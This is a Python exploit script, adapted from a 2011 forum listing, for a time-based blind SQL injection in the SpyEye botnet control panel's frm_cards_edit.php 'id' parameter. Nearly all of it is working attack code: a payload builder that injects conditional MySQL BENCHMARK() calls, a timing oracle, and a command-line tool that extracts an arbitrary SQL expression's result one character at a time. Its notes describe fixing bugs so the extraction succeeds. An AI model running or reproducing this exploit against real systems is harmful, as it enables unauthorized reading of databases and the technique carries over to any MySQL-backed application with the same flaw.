Time-based blind SQL injection in the SpyEye botnet control panel (`frm_cards_edit.php`, `id` parameter), discovered by S4(uR4. The script below extracts the result of an arbitrary MySQL expression one character at a time by injecting a conditional `BENCHMARK()` and measuring the response delay.
Python (the forum labelled the listing "PHP"; it is a Python 2 script using `httplib`):
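#!/usr/bin/python
"""Time-based blind SQL injection PoC against the SpyEye C2 panel (2011).

The SpyEye control panel's ``frm_cards_edit.php`` takes an ``id`` query
parameter that reaches a MySQL query unescaped.  For every character of the
attacker-chosen expression ``sql`` the script injects

    1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((<sql>),<pos>,1)),0)=<code>),
                     BENCHMARK(9000000,SHA1(1)),1));-- /*

and treats a reply slower than ``DELAY`` seconds as "character matched".

Review notes (know this before trusting the output):

* Detection is purely timing-based.  There is no baseline measurement, so
  network jitter or server load above ``DELAY`` gives false positives, and a
  host that finishes the BENCHMARK branch faster than ``DELAY`` gives a
  truncated or wrong result.  Every true hit burns ~9M SHA1 rounds of target
  CPU, once per recovered character.
* MySQL only: ``BENCHMARK``, ``SHA1``, the ``-- `` comment terminator and the
  1-based ``SUBSTRING`` offset are all MySQL-specific.
* ``sql`` is spliced into the payload verbatim and never escaped; that is the
  purpose of the argument, not an oversight.
* Plain HTTP on port 80 (``PORT``); the probes travel in the clear.

Changes from the original forum listing: the garbled list initialiser
(``full = ****``) is restored; the SUBSTRING offset now advances with each
recovered character (the listing reset ``j`` to 0 before every request, so it
probed offset 0 forever and could never match); ``'z'`` (122) is added to the
charset, which ``range(48, 122)`` excluded; a socket timeout stops a hung host
from blocking forever; the per-request body dumps and debug prints are gone;
the ASCII-art banner, whose whitespace the paste destroyed, is reduced to its
text lines.  Runs under Python 2 and 3.
"""
from __future__ import print_function

import socket
import sys
from time import time

try:  # Python 3
    from http.client import HTTPConnection
    from urllib.parse import urlencode
except ImportError:  # Python 2, which the original listing targeted
    from httplib import HTTPConnection
    from urllib import urlencode

BANNER = """
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 >> SpyEye r0073r xpl01t
 >> author : Sanjar Satsura
 >> sanjar[at]xakep[dot]ru
 >> Public v.0.1
 >> )c( 2011
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"""
USAGE = ('usage: Spyeye_r0073r <host> </panel/dir/> "<sql expression>"\n'
         '  e.g. Spyeye_r0073r 10.0.0.5 /spyeye/ "version()"')

PORT = 80
ENDPOINT = "frm_cards_edit.php"
DELAY = 0.5       # seconds; a reply slower than this counts as a hit
TIMEOUT = 60.0    # socket timeout; a timeout is treated as a (very slow) hit
MAX_LEN = 32      # the listing stopped after 32 characters (an MD5 hash)
# '0'..'z' (48..122).  The listing used range(48, 122), which silently
# dropped 'z'; digits, upper/lower case and the punctuation between them.
CHARSET = tuple(range(48, 123))


def build_payload(sql, position, code):
    """Return the ``id`` value whose reply is slow iff char ``position`` of ``sql`` is ``code``.

    ``position`` is MySQL's 1-based SUBSTRING offset and ``code`` an ASCII
    value.  ``sql`` is not escaped: it is the attacker's own expression.
    """
    return ("1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + "),"
            + str(position) + ",1)),0)=" + str(code)
            + "),BENCHMARK(9000000,SHA1(1)),1));-- /*")


def build_query(sql, position, code):
    """URL-encode the payload as the ``id=...`` query string."""
    return urlencode({"id": build_payload(sql, position, code)})


def probe(host, path, sql, position, code, port=PORT, timeout=TIMEOUT):
    """Issue one probe and return ``(elapsed_seconds, http_status)``.

    ``http_status`` is ``None`` when the socket timed out; for a time-based
    oracle that is itself a slow reply, and ``elapsed`` reflects it.
    """
    conn = HTTPConnection(host, port, timeout=timeout)
    started = time()
    try:
        conn.request("GET", path + ENDPOINT + "?" + build_query(sql, position, code))
        response = conn.getresponse()
        response.read()  # drain the body so the connection closes cleanly
        status = response.status
    except socket.timeout:
        status = None
    finally:
        conn.close()
    return time() - started, status


def extract(host, path, sql, port=PORT, delay=DELAY, max_len=MAX_LEN,
            charset=CHARSET, probe_fn=probe, out=None):
    """Recover up to ``max_len`` characters of ``sql``'s result and return them.

    Each recovered character is echoed to ``out`` (default ``sys.stdout``) as
    soon as it is found.  Extraction stops early when no charset member
    produces a delay: either the value ended or a timing hit was missed.
    Raises ``RuntimeError`` if the endpoint answers 404.  ``probe_fn`` lets the
    oracle logic run against a stand-in instead of a live target.
    """
    out = sys.stdout if out is None else out
    recovered = ""
    for position in range(1, max_len + 1):  # SUBSTRING offsets are 1-based
        for code in charset:
            elapsed, status = probe_fn(host, path, sql, position, code, port=port)
            if status == 404:
                raise RuntimeError("%s%s returned 404" % (path, ENDPOINT))
            if elapsed > delay:
                out.write(chr(code))
                out.flush()
                recovered += chr(code)
                break
        else:
            # Charset exhausted without a hit: end of value (or a missed hit).
            break
    return recovered


def main(argv=None):
    """CLI entry point: ``<host> </panel/dir/> "<sql>"``; exits non-zero on misuse."""
    argv = sys.argv if argv is None else argv
    print(BANNER)
    if len(argv) < 4:
        sys.exit(USAGE)
    host, path, sql = argv[1:4]
    if not path.endswith("/"):
        path += "/"  # ENDPOINT is appended directly, as in the listing
    print("[+]Started pwn...")
    try:
        extract(host, path, sql)
    except RuntimeError as exc:
        sys.exit("[+]" + str(exc))
    print("\n[+]Finished\n")


# Original listing published via www.r00tw0rm.com
if __name__ == "__main__":
    main()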